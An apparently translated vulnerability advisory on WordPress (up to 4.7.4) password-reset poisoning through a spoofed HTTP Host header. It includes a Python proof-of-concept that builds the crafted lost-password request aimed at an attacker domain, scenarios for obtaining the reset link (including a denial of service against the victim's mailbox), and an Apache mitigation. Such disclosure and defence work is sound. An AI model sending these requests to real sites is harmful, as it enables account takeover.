WordPress Version <= 4.7.4
Note: all WordPress versions available at the time of writing (up to and including the latest release, 4.7.4) are affected.
When a user requests a password reset, the WordPress server sends an e-mail containing a reset link to the mailbox registered for that account. If an attacker can obtain the contents of that message, the link can be used to change the user's password.
Using the same principle as the previous vulnerability, the attacker can set the "sender" (From) address of the reset e-mail to an address under the attacker's own control through the HTTP Host header: WordPress builds the default From address from SERVER_NAME, and on common Apache configurations SERVER_NAME is copied from the client-supplied Host header rather than from the server's configured name. Under certain conditions the attacker can then obtain the contents of the message and reset the user's password.
The original author gives three scenarios in which the message could reach the attacker:
1. If the attacker knows in advance which mailbox is registered for the admin user, that mailbox can be taken out of service by denial-of-service means (flooding it with large messages, attacking its DNS server) so that the reset e-mail is rejected or cannot be delivered. The resulting bounce (non-delivery report), which normally quotes the original message, is then sent to the address the attacker constructed. Note that bounces go to the envelope sender (Return-Path), so this relies on the mail server using the spoofed address there as well as in the From header.
2. The "autoresponder" feature of some mail services returns the contents of the incoming message, for example as an attachment, to the sender address.
3. If reset e-mails are sent to the target mailbox repeatedly, the user may be provoked into replying; replies are addressed to the spoofed sender and usually quote the previous message body, including the reset link.
So far this seems very difficult to exploit in practice; perhaps readers with social-engineering experience can suggest a new approach.
PoC HTTP Request
POST /wp/wordpress/wp-login.php?action=lostpassword HTTP/1.1
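As an added example (not code from the original post or from the WordPress project), the following Python script builds a lost-password request with a caller-chosen Host header and models how the reset e-mail's From address is derived from it. The server-side derivation mirrors my reading of wp_mail() in WordPress 4.7.x, where the default From is "wordpress@" followed by the lower-cased SERVER_NAME with any leading "www." removed; the host names, account name and form fields are assumptions.

```python
"""Added example, not from the original post or the WordPress project: how a
spoofed Host header ends up as the From address of the password-reset mail.
Host names and the account name are constructed for illustration."""
from urllib.parse import urlencode

# Assumed values: the site's configured ServerName and an attacker-owned domain.
SITE_CANONICAL_NAME = "victim-blog.example"
ATTACKER_HOST = "attacker-mx.example"


def build_lostpassword_request(host, user_login, path="/wp/wordpress/wp-login.php"):
    """Raw HTTP/1.1 POST to wp-login.php?action=lostpassword; the caller picks
    the Host header. The path matches the request line quoted in the post."""
    body = urlencode({"user_login": user_login, "redirect_to": "",
                      "wp-submit": "Get New Password"}).encode()
    head = "\r\n".join([
        f"POST {path}?action=lostpassword HTTP/1.1",
        f"Host: {host}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",
        "Connection: close",
    ])
    return head.encode() + b"\r\n\r\n" + body


def parse_host_header(raw_request):
    """Return the Host header value without any :port suffix."""
    head = raw_request.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    for line in head.split("\r\n")[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "host":
            return value.strip().split(":", 1)[0]
    raise ValueError("request has no Host header")


def apache_server_name(request_host, canonical_name, use_canonical_name):
    """SERVER_NAME as Apache populates it: UseCanonicalName Off (the default)
    echoes the client's Host header, UseCanonicalName On uses ServerName."""
    return canonical_name if use_canonical_name else request_host


def wp_default_from(server_name):
    """Default From address of wp_mail() in WordPress 4.7.x (my reading of
    pluggable.php): 'wordpress@' + lower-cased SERVER_NAME, leading 'www.' dropped."""
    sitename = server_name.lower()
    if sitename.startswith("www."):
        sitename = sitename[4:]
    return "wordpress@" + sitename


def reset_mail_from(raw_request, use_canonical_name):
    """End to end: raw request -> SERVER_NAME -> From address of the reset mail."""
    host = parse_host_header(raw_request)
    return wp_default_from(apache_server_name(host, SITE_CANONICAL_NAME, use_canonical_name))


if __name__ == "__main__":
    req = build_lostpassword_request(ATTACKER_HOST, "admin")
    print(req.decode())
    print("UseCanonicalName Off ->", reset_mail_from(req, False))
    print("UseCanonicalName On  ->", reset_mail_from(req, True))
```

With UseCanonicalName Off the From address of the reset mail becomes wordpress@attacker-mx.example, which is where bounces, autoresponses and replies end up; with UseCanonicalName On the same request yields wordpress@victim-blog.example, so the Host header no longer influences the sender.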
Temporary protection method
WordPress has not yet released a fix or update for this issue; users can apply the following temporary mitigation:
On Apache, turn on UseCanonicalName (UseCanonicalName On, together with a ServerName directive) so that SERVER_NAME is forced to the configured static value instead of being taken from the client-supplied Host header.
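As an added example (not from the original post), this is the Apache configuration the mitigation refers to, with the weak default shown beside the corrected setting; the host name is assumed.

```apache
# Added example, not from the original post; the host name is assumed.
# Weak (Apache default): SERVER_NAME is copied from the client's Host header,
# so a request carrying "Host: attacker-mx.example" makes WordPress send the
# reset mail From: wordpress@attacker-mx.example.
#   UseCanonicalName Off

# Mitigation: SERVER_NAME is taken from ServerName regardless of the Host header.
ServerName victim-blog.example
UseCanonicalName On
```

Place the two directives in the virtual host (or main server configuration) that serves WordPress and reload Apache. To check the result, request a page that prints $_SERVER['SERVER_NAME'] while sending an arbitrary Host header, for example with curl -H "Host: attacker-mx.example"; it should now show the configured ServerName.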
Reference link: http://ift.tt/2p8bQIS